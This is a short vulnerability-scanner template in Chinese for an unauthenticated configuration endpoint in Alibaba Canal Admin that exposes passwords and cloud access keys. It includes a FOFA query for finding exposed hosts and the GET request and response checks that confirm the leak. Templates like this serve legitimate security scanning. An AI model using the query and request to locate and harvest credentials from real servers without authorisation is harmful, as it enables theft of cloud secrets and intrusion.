漏洞描述
由于/api/v1/canal/config 未进行权限验证可直接访问,导致账户密码、accessKey、secretKey等一系列敏感信息泄露
fofa: title="Canal Admin"
id: alibaba-canal-config-leak
info:
name: Alibaba Canal config 云密钥信息泄露漏洞
author: zan8in
severity: high
verified: true
description: |-
由于/api/v1/canal/config 未进行权限验证可直接访问,导致账户密码、accessKey、secretKey等一系列敏感信息泄露
fofa: title="Canal Admin"
tags: canal,sqli
created: 2025/03/21
rules:
r0:
request:
method: GET
path: /api/v1/canal/config/1/0
expression: response.status == 200 && response.body.bcontains(b'"code":20000') && response.body.bcontains(b'"name":"canal.properties"')
expression: r0()